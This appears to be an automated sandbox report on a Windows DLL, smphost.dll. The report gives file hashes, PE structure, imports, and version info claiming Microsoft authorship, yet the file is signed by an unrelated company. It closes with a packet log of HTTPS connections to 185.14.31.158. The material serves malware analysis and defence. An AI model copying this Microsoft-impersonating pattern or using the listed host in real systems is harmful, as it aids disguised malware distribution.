SHA-512:	6F8F9CD35F5543F9CF5E15918FC7463CD8545A1E42B4F8F8ED94A204CCC8FBA2359ACEA2062F45D6105E771A6F9AB2C92692DB50B2EFFCDB7AF92093D4483AD5
Malicious:	false
Preview:	MDMP....... ..........a....................................4...NN..........T.......8...........T...........`P...............'..........x)...................................................................U...........B.......*......GenuineIntelW...........T...........W..a.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.273231081638743
Encrypted:	false
SSDEEP:	12288:Lv496ASvyWbVus7uYbNPUB6U4Yal9N63JjvSaH9PKku6X/9c9sMRSO:7496ASvyWbVus7f1
MD5:	065CCF68DC5FE8D5AC14F5B30BDEEF5B
SHA1:	4E531CCF4A0987BE26C8BF5657395BBA28FB8E43
SHA-256:	F556D5B952BF5686C3D77229CAAB6AAF9DF46B91620126D50F12444A967A0150
SHA-512:	980D2A4527591F094E7156471B1D88499FD45B3A1035F94CB3CBC8F11F1CE64F1594E2D8B1451ADB239F6FC3798F70F666B4BA5F66F3ADE374A9F531249F2F63
Malicious:	false
Preview:	regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm&.. ...............................................................................................................................................................................................................................................................................................................................................F...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	4.028041512447004
Encrypted:	false
SSDEEP:	384:VRwp5Rftx1+PJ4XpsF8nk7kdPBqXpSeq5QMVyi6+/2l4Lk41Zd1DoXzn0Lsbwvg:3w3Rftx1kJ4X+F8k7eBqXQeq5QMVyi6I
MD5:	FCA21CEF07EB5F05E1E92D9B1645858E
SHA1:	35797A6914C2B07CA97855B865CD27AA98573AE8
SHA-256:	EF536B299AE7BF8A7A389CB6A2B7CAA22EBEB1886028E85F5209BE8963C2F0A3
SHA-512:	93FBB08DAEED81EC8AECD169CD84D94AA5A7AF81C2333BF426DFFBACEAA9FDD328FAFBAE3EA535D9FE0AA2B4537E44E2E80F9A795BAD6EA734096F8644E4781B
Malicious:	false
Preview:	regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm&.. ...............................................................................................................................................................................................................................................................................................................................................@...HvLE.^......Y............sM..`.}...+.;.%.........0................... ..hbin................p.\..,..........nk,.}.. .......0........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .}.. ....... ........................... .......Z.......................Root........lf......Root....nk .}.. ....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

Static File Info

General

File type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Entropy (8bit):	6.319927202557722
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	smphost.dll
File size:	147656
MD5:	fc484855692f2a7d1eae090086a1eb72
SHA1:	2e9103747750b40835f58d9e57c2ab75eeaf25f6
SHA256:	e58b9bbb7bcdf3e901453b7b9c9e514fed1e53565e3280353dccc77cde26a98e
SHA512:	2f6b6e8aa82dc4aa61a540bae1d98682ec79e73ccfeaf9c273b053c2162f35207842f7ab2f1bc06e927d706ec88ecf209d2c57e86323c38fb43e9d694e624311
SSDEEP:	3072:biKjfYjd3b9fSCNq01bKrF5HiLCK08WA46tvTj:+QfYjBMCNcC+KlWuB3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........1.x.b.x.b.x.b...c.x.b...c`x.b...c.x.b...c.x.b...c.x.b...c.x.b...c.x.b.x.b.x.b...c.x.b...c.x.b...c.x.bRich.x.b...............

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:	0x100095e3
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x10000000
Subsystem:	windows cui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x61C2D9AE [Wed Dec 22 07:54:22 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	793636b04c2e2f8cfe97a0d2fa1b60e1

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	12/1/2021 4:00:00 PM 12/2/2022 3:59:59 PM
Subject Chain	CN=SATURN CONSULTANCY LTD, O=SATURN CONSULTANCY LTD, S=Essex, C=GB
Version:	3
Thumbprint MD5:	87CFAD0A22E828FF235A83CA03E90993
Thumbprint SHA-1:	430DBEFF2F6DF708B03354D5D07E78400CFED8E9
Thumbprint SHA-256:	44DAF53D607937F410C3D300100399514D0EE5B03487E7EAD16DFE324D2C5563
Serial:	205483936F360924E8D2A4EB6D3A9F31

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FAAF49D1C27h
call 00007FAAF49D2029h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FAAF49D1AD3h
add esp, 0Ch
pop ebp
retn 000Ch
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 100153A0h
mov dword ptr [ecx], 10015398h
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FAAF49D1BFFh
push 1001A634h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FAAF49D2AF7h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FAAF49CB6ECh
push 1001A538h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FAAF49D2ADAh
int3
push ebp
mov ebp, esp
and dword ptr [1001CFF0h], 00000000h
sub esp, 24h
or dword ptr [1001C010h], 01h
push 0000000Ah
call dword ptr [100150C4h]
test eax, eax
je 00007FAAF49D1DCFh
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-1Ch]
mov dword ptr [ebp-0Ch], eax
xor edi, 0065746Eh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1ab30	0x80	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1abb0	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x20000	0x5694	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x21a00	0x26c8	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1e000	0x132c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x19f0c	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x19f28	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x15000	0x1b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x13939	0x13a00	False	0.54204816879	data	6.52399222454	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x15000	0x65be	0x6600	False	0.417662377451	data	4.95436624069	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1c000	0x1a20	0xa00	False	0.171484375	DOS executable (block device driver)	2.41006083543	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x1e000	0x132c	0x1400	False	0.748828125	data	6.45202754591	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x20000	0x5694	0x5800	False	0.205344460227	data	3.76919834084	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
MUI	0x2010c	0xf0	data	English	United States
WEVT_TEMPLATE	0x201fc	0x50ca	data	English	United States
RT_VERSION	0x252c8	0x3cc	data	English	United States

Imports

DLL	Import
KERNEL32.dll	DeleteCriticalSection, CreateMutexExW, GetPriorityClass, GetProcessId, GetVersion, GetProductInfo, InitializeCriticalSectionEx, FormatMessageA, FormatMessageW, GetConsoleCP, CreateFileW, CloseHandle, GetStringTypeW, SetFilePointerEx, GetProcessHeap, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetLastError, RaiseException, DecodePointer, DisableThreadLibraryCalls, SetFileAttributesW, SetStdHandle, GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, GetCommandLineW, GetCommandLineA, GetCPInfo, GetOEMCP, GetACP, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetCurrentProcess, TerminateProcess, OutputDebugStringW, EnterCriticalSection, LeaveCriticalSection, RtlUnwind, InterlockedFlushSList, SetLastError, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, LCMapStringW, GetStdHandle, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, WriteConsoleW
USER32.dll	CharNextW, CreatePopupMenu, GetMessageTime
GDI32.dll	TextOutA, FlattenPath, TextOutW
ADVAPI32.dll	RevertToSelf, IsValidSid, IsValidAcl, IsTokenRestricted, GetSidIdentifierAuthority, CveEventWrite
SHELL32.dll	DuplicateIcon
ole32.dll	CoGetCallerTID, CoCreateInstance, CoInitialize, CoTaskMemAlloc, OleInitialize, CoCancelCall
SHLWAPI.dll	SHStrDupA, SHStrDupW, SHGetThreadRef
RPCRT4.dll	UuidCreate, DceErrorInqTextA, RpcExceptionFilter

Exports

Name	Ordinal	Address
DllInstall	1	0x10008630
DllRegisterServer	2	0x10008a90
DllUnregisterServer	3	0x10008be0

Version Infos

Description	Data
LegalCopyright	Microsoft Corporation. All rights reserved.
InternalName	smphost.dll
FileVersion	10.0.21286.1000 (WinBuild.160101.0800)
CompanyName	Microsoft Corporation
ProductName	Microsoft Windows Operating System
ProductVersion	10.0.21286.1000
FileDescription	Storage Management Provider (SMP) host service
OriginalFilename	smphost.dll
Translation	0x0000 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 30, 2022 13:30:33.977838039 CET	49758	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:33.977916002 CET	443	49758	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:33.978091955 CET	49758	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:33.978382111 CET	49758	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:33.978481054 CET	443	49758	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:33.978565931 CET	49758	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.090568066 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.090630054 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.090724945 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.256150961 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.256189108 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.404779911 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.404989958 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.653903961 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.653970957 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.654545069 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.655244112 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.658020973 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.701879025 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.728059053 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.728107929 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.728199005 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.728241920 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.728265047 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.728332043 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.816287994 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.816338062 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.816478014 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.816495895 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.816580057 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.818627119 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.818665028 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.818783998 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.818795919 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.818902016 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.862592936 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.862646103 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.862755060 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.862778902 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.862853050 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.862973928 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.863012075 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.863109112 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.863121033 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.863219976 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.904947996 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.905000925 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.905122042 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.905136108 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.905216932 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.907210112 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.907255888 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.907347918 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.907356024 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.907424927 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.928639889 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.928664923 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.928805113 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.928819895 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.928877115 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.949212074 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.949237108 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.949358940 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.949372053 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.949455023 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.949583054 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.949650049 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:34.949692965 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.949783087 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.949860096 CET	49759	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:34.949873924 CET	443	49759	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.169367075 CET	49760	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.169429064 CET	443	49760	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.169559956 CET	49760	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.170130014 CET	49760	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.170181990 CET	443	49760	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.170325041 CET	49760	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.171827078 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.171885967 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.171983004 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.173729897 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.173774004 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.320491076 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.320641041 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.321043968 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.321063042 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.326559067 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.326603889 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.412787914 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.412842989 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.412962914 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.413005114 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.413028955 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.414619923 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.456871033 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.456922054 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.457041979 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.457082987 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.457108021 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.457153082 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.502325058 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.502374887 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.502494097 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.502533913 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.502557993 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.502629042 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.526195049 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.526242018 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.526364088 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.526403904 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.526427984 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.527184010 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.546447992 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.546495914 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.546619892 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.546659946 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.546684980 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.547058105 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.549803019 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.549875021 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.549972057 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.550009966 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.550035000 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.550257921 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.572417021 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.572462082 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.572585106 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.572624922 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.572649956 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.573754072 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.590658903 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.590706110 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.590835094 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.590874910 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.590898991 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.591131926 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.591169119 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.591226101 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.591245890 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.591259003 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.591344118 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.591546059 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.591582060 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.591629028 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.591645002 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.591659069 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.591697931 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.592044115 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.592078924 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.592130899 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.592144012 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.592181921 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.592200041 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.616771936 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.616816044 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.617018938 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.617034912 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.617115021 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.634684086 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.634732008 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.634850979 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.634891033 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.634915113 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.634984970 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.635301113 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.635341883 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.635386944 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.635402918 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.635421038 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.635456085 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.635698080 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.635732889 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.635796070 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.635812998 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.635828972 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.636204958 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.636240005 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.636308908 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.636332035 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.636348009 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.636646032 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.636694908 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.636763096 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.636778116 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.636822939 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.636841059 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.637046099 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.637079954 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.637151003 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.637161970 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.637176037 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.637468100 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.637501001 CET	443	49761	185.14.31.158	192.168.2.3
